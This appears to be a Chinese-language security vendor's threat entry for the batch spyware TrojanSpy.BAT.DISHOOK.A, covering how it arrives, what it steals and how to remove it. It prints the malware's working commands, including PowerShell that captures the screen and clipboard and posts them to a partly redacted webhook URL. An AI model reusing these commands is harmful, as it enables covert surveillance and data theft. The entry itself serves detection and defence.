分析者: Raighen Sanchez   
 平台:

Windows

 总体风险等级:
 潜在破坏:
 潜在分布:
 感染次数:
 信息暴露:

  • 恶意软件类型:
    Trojan Spy

  • 有破坏性?:
    没有

  • 加密?:
    没有

  • In the Wild:
    是的

  概要

感染途徑: 从互联网下载、由其他恶意软件释放

该木马间谍程序通过两种途径进入系统:一是被其他恶意软件作为文件释放到系统中,二是用户访问恶意网站时在不知情的情况下下载的文件。

它不具备任何传播功能。

该程序会连接至网站进行信息收发。 它不具备任何后门功能。

然而截至本文撰写时,上述网站均已无法访问。

  技术详细信息

文件大小: 4,316 bytes
报告日期: BAT
内存驻留: 没有
初始樣本接收日期: 2025年8月1日
Payload: 连接URL/IP地址, 收集系统信息, 窃取信息

Arrival Details

该木马间谍程序通过两种途径进入系统:一是被其他恶意软件作为文件释放到系统中,二是用户访问恶意网站时在不知情的情况下下载的文件。

Installation

该间谍木马会释放以下文件:

  • %User Temp%\screenshot.png → captured screenshot
  • %User Temp%\clipboard_history.txt → clipboard content
  • %User Temp%\tmp_geo.json → deleted afterwards

(Note: %User Temp% 是当前用户的临时文件夹,通常位于此路径 C:\Documents and Settings\{user name}\Local Settings\Temp 在Windows 2000(32位)、XP及Server 2003(32位)系统上,或 C:\Users\{user name}\AppData\Local\Temp 在Windows Vista、7、8、8.1、2008(64位)、2012(64位)及10(64位)系统上。)

它会添加以下进程:

  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "RegisteredOwner"
  • powershell -command "(Invoke-WebRequest -Uri 'https://{BLOCKED}-api.com ').Content"
  • powershell -NoProfile -Command "(Get-Content '%User Temp%\tmp_geo.json' | ConvertFrom-Json).country"
  • curl -s "https://{BLOCKED}-api.com /json/{public ip address}" > "%temp%\tmp_geo.json"
  • powershell -Command "try { Get-Clipboard -Raw } catch { '' }"
  • powershell -NoProfile -Command "Add-Type -AssemblyName System.Windows.Forms, System.Drawing;" "$bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds;" "$bmp = New-Object Drawing.Bitmap $bounds.Width, $bounds.Height;" "$graphics = [Drawing.Graphics]::FromImage($bmp);" "$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.Size);" "$bmp.Save('%User Temp%\screenshot.png', [Drawing.Imaging.ImageFormat]::Png);"
  • powershell -NoProfile -Command "$webhookUrl = 'https://{BLOCKED}d.com/api/webhooks/1393566442842226800/eDTSlOpqEFMYJqCGMgWD7lCqzk1theJLOgIB0Rv2nwyzDx-WvPoNnFTcr5BDnHXBOuu0 ';" "$screenshotPath = '%User Temp%\screenshot.png';" "$clipboardPath = '%User Temp%\clipboard_history.txt';" "$payload = @{embeds = @(@{title='System Information'; color=3447003; fields=@(" "@{name='IP Address'; value=''; inline=$false}," "@{name='Country'; value=''; inline=$false}," "@{name='Registered Owner'; value='{username} '; inline=$false}," "@{name='Computer Name'; value='{hostname}'; inline=$false}," "@{name='Clipboard History'; value='See attached clipboard_history.txt'; inline=$false}" "); image=@{url='attachment://screenshot.png'}})};" "$json = $payload | ConvertTo-Json -Depth 6;" "$boundary = [System.Guid]::NewGuid().ToString();" "$LF = \"`r`n\";" "$body = New-Object System.IO.MemoryStream;" "$writer = New-Object System.IO.StreamWriter($body);" "$writer.Write(\"--$boundary$LF\");" "$writer.Write('Content-Disposition: form-data; name=\"payload_json\"' + \"$LF\");" "$writer.Write('Content-Type: application/json' + \"$LF$LF\");" "$writer.Write($json + \"$LF\");" "$writer.Write(\"--$boundary$LF\");" "$writer.Write('Content-Disposition: form-data; name=\"file1\"; filename=\"screenshot.png\"' + \"$LF\");" "$writer.Write('Content-Type: image/png' + \"$LF$LF\");" "$writer.Flush();" "$fileBytes = [System.IO.File]::ReadAllBytes($screenshotPath);" "$body.Write($fileBytes, 0, $fileBytes.Length);" "$writer.Write(\"$LF--$boundary$LF\");" "$writer.Write('Content-Disposition: form-data; name=\"file2\"; filename=\"clipboard_history.txt\"' + \"$LF\");" "$writer.Write('Content-Type: text/plain; charset=utf-8' + \"$LF$LF\");" "$writer.Flush();" "$clipBytes = [System.IO.File]::ReadAllBytes($clipboardPath);" "$body.Write($clipBytes, 0, $clipBytes.Length);" "$writer.Write(\"$LF--$boundary--$LF\");" "$writer.Flush();" "$body.Position = 0;" "$headers = @{ 'Content-Type' = \"multipart/form-data; boundary=$boundary\" };" "Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $body -Headers $headers"

Propagation

该木马间谍程序不具备任何传播功能。

Backdoor Routine

该木马间谍程序会连接以下网站进行信息传输:

  • https://{BLOCKED}d.com/api/webhooks/1393566442842226800/eDTSlOpqEFMYJqCGMgWD7lCqzk1theJLOgIB0Rv2nwyzDx-WvPoNnFTcr5BDnHXBOuu0

它不具备任何后门功能。

Rootkit Capabilities

该木马间谍程序不具备 rootkit 功能。

Information Theft

该木马间谍程序会收集以下数据:

  • Screenshot
  • Clipboard History
  • 公网IP地址;/li>
  • Windows注册所有者
  • Hostname
  • Geolocation
  • System GUID

其他信息

该间谍木马会连接以下URL以获取受感染系统的IP地址:

  • https://{BLOCKED}ify.org
  • https://{BLOCKED}-api.com

它会执行以下操作:

  • 该程序会截取系统屏幕截图并保存为文件。

然而截至本文撰写时,上述网站均已无法访问。

它不会利用任何漏洞。

  解决方案

最小扫描引擎: 9.800
First VSAPI Pattern File: 20.390.04
VSAPI 第一样式发布日期: 2025年8月12日
VSAPI OPR样式版本: 20.391.00
VSAPI OPR样式发布日期: 2025年8月13日

Step 1

在进行任何扫描之前,Windows 7、Windows 8、Windows 8.1 和 Windows 10 用户必须先执行以下操作: 禁用 系统还原 以便对电脑进行全面扫描。

Step 2

注意:在此恶意软件/间谍软件/灰色软件执行期间,并非所有文件、文件夹和注册表键值和项都会安装到您的计算机上。这可能是由于不完整的安装或其他操作系统条件所致。如果您没有找到相同的文件/文件夹/注册表信息,请继续进行下一步操作。

Step 3

搜索并删除此文件

[ 更多 ]
某些文件可能被隐藏,请务必勾选 搜索隐藏的文件和文件夹 勾选框 "更多进阶选项" 选项,以在搜索结果中包含所有隐藏的文件和文件夹。
  • %User Temp%\screenshot.png
  • %User Temp%\clipboard_history.txt
  • %User Temp%\tmp_geo.json
请按以下步骤操作=

要手动从受感染系统中删除恶意软件/灰色软件文件:

•适用于 Windows 7、Windows Server 2008 (R2)、Windows 8、Windows 8.1、Windows 10 及 Windows Server 2012 (R2):

  1. 打开 Windows 资源管理器窗口。
    • 对于 Windows 7 和 Server 2008 (R2) 用户:点击Start>Computer.
    • 对于 Windows 8、8.1、10 及 Server 2012 (R2) 用户: 右键单击 屏幕左下角,然后点击File Explorer.
  2. 搜索计算机/此电脑输入框中,键入:
    • %User Temp%\screenshot.png
    • %User Temp%\clipboard_history.txt
    • %User Temp%\tmp_geo.json
  3. 定位到该文件后,选中并按 SHIFT+DELETE 将其删除。
    *Note:阅读以下微软官方页面 若上述步骤在 Windows 7 和 Windows Server 2008 (R2) 系统上无效:

Step 4

使用您的亚信安全产品扫描电脑,删除被检测为以下名称的文件 TrojanSpy.BAT.DISHOOK.A. 若亚信安全产品已将检测到的文件清除、删除或隔离,则无需再执行任何额外步骤;您也可选择直接删除隔离区中的文件。更多信息请访问以下亚信安全支持页面: